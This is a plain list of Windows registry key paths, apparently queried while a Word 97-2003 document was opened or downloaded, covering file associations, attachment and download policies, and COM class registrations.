HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler
HKEY_CLASSES_ROOT\.htm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.htm\(Default)
HKEY_CLASSES_ROOT\.html
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.html\(Default)
HKEY_CLASSES_ROOT\.mht
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mht\(Default)
HKEY_CLASSES_ROOT\.mhtml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mhtml\(Default)
HKEY_CLASSES_ROOT\.shtm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.shtm\(Default)
HKEY_CLASSES_ROOT\.shtml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.shtml\(Default)
HKEY_CLASSES_ROOT\.xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xml\(Default)
HKEY_CLASSES_ROOT\.xsl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xsl\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Word.Document.8\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Word.Document.8
HKEY_CLASSES_ROOT\Word.Document.8
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\EditFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\AttachmentExecute\{0002DF01-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers\Word.Document.8
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CLASSES_ROOT\.fxp
HKEY_CLASSES_ROOT\.gadget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gadget\(Default)
HKEY_CLASSES_ROOT\.grp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.grp\(Default)
HKEY_CLASSES_ROOT\.hlp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hlp\(Default)
HKEY_CLASSES_ROOT\.hta
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hta\(Default)
HKEY_CLASSES_ROOT\.inf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.inf\(Default)
HKEY_CLASSES_ROOT\.ins
HKEY_CLASSES_ROOT\.isp
HKEY_CLASSES_ROOT\.its
HKEY_CLASSES_ROOT\.js
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_CLASSES_ROOT\.jse
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.JSE\(Default)
HKEY_CLASSES_ROOT\.ksh
HKEY_CLASSES_ROOT\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_CLASSES_ROOT\.mad
HKEY_CLASSES_ROOT\.maf
HKEY_CLASSES_ROOT\.mag
HKEY_CLASSES_ROOT\.mam
HKEY_CLASSES_ROOT\.maq
HKEY_CLASSES_ROOT\.mar
HKEY_CLASSES_ROOT\.mas
HKEY_CLASSES_ROOT\.mat
HKEY_CLASSES_ROOT\.mau
HKEY_CLASSES_ROOT\.mav
HKEY_CLASSES_ROOT\.maw
HKEY_CLASSES_ROOT\.mcf
HKEY_CLASSES_ROOT\.mda
HKEY_CLASSES_ROOT\.mdb
HKEY_CLASSES_ROOT\.mde
HKEY_CLASSES_ROOT\.mdt
HKEY_CLASSES_ROOT\.mdw
HKEY_CLASSES_ROOT\.mdz
HKEY_CLASSES_ROOT\.msc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\(Default)
HKEY_CLASSES_ROOT\.msh
HKEY_CLASSES_ROOT\.mshxml
HKEY_CLASSES_ROOT\.msi
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msi\(Default)
HKEY_CLASSES_ROOT\.msp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msp\(Default)
HKEY_CLASSES_ROOT\.mst
HKEY_CLASSES_ROOT\.ops
HKEY_CLASSES_ROOT\.pcd
HKEY_CLASSES_ROOT\.pif
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pif\(Default)
HKEY_CLASSES_ROOT\.pl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pl\(Default)
HKEY_CLASSES_ROOT\.prf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.prf\(Default)
HKEY_CLASSES_ROOT\.prg
HKEY_CLASSES_ROOT\.pst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pst\(Default)
HKEY_CLASSES_ROOT\.reg
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg\(Default)
HKEY_CLASSES_ROOT\.scf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.scf\(Default)
HKEY_CLASSES_ROOT\.scr
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.scr\(Default)
HKEY_CLASSES_ROOT\.sct
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sct\(Default)
HKEY_CLASSES_ROOT\.shb
HKEY_CLASSES_ROOT\.shs
HKEY_CLASSES_ROOT\.tmp
HKEY_CLASSES_ROOT\.url
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\(Default)
HKEY_CLASSES_ROOT\.vb
HKEY_CLASSES_ROOT\.vbe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.VBE\(Default)
HKEY_CLASSES_ROOT\.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vbs\(Default)
HKEY_CLASSES_ROOT\.vsmacros
HKEY_CLASSES_ROOT\.vss
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vss\(Default)
HKEY_CLASSES_ROOT\.vst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vst\(Default)
HKEY_CLASSES_ROOT\.vsw
HKEY_CLASSES_ROOT\.ws
HKEY_CLASSES_ROOT\.wsc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.wsc\(Default)
HKEY_CLASSES_ROOT\.wsf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.WSF\(Default)
HKEY_CLASSES_ROOT\.wsh
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.WSH\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.doc
HKEY_CLASSES_ROOT\.doc\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\IsShortcut
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\ExecutableTypes
HKEY_CLASSES_ROOT\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.com/tuzpq/file/cooujsc19a2cegnj6_tcmotog-266543746/
HKEY_CLASSES_ROOT\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/
HKEY_CLASSES_ROOT\Unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\EditFlags
HKEY_CLASSES_ROOT\SystemFileAssociations\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/
HKEY_CLASSES_ROOT\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\EditFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\EditFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\System
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\FriendlyTypeName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOWNLOAD_PROMPT_META_CONTROL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DOWNLOAD_PROMPT_META_CONTROL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\MS Shell Dlg
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\application/msword\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\application/msword
HKEY_CLASSES_ROOT\application/msword
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DownloadUI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\DownloadUI
HKEY_CURRENT_USER\Software\Classes\Interface\{0000000E-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0000000E-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0000000E-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NotifyDownloadComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV8
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\PhishingFilter\EnabledV8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\ScanWithAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\SaveZoneInformation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\UseTrustedHandlers
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1807
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1807
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VirusScanner
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\VirusScanner
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\CLSID\Implemented Categories\
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000002F-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000100-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000101-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000103-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000104-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000105-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000106-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000107-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000109-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000300-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000301-A8F2-4877-BA0A-FD2B6645FB94}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000303-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000304-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000305-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000306-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000308-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000309-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000030B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000315-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000316-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000319-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000031A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000031D-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000320-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000327-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000032E-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000507-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000050B-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000514-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000535-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000541-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000560-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000602-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000609-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000615-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000618-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000061B-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000061E-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00000621-0000-0010-8000-00AA006D2EA4}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020000-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020001-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020003-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002000D-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002000F-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002034C-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002034E-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020421-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020422-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020423-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020425-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020800-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020801-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020803-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020810-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020811-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020812-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020818-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020819-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020827-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
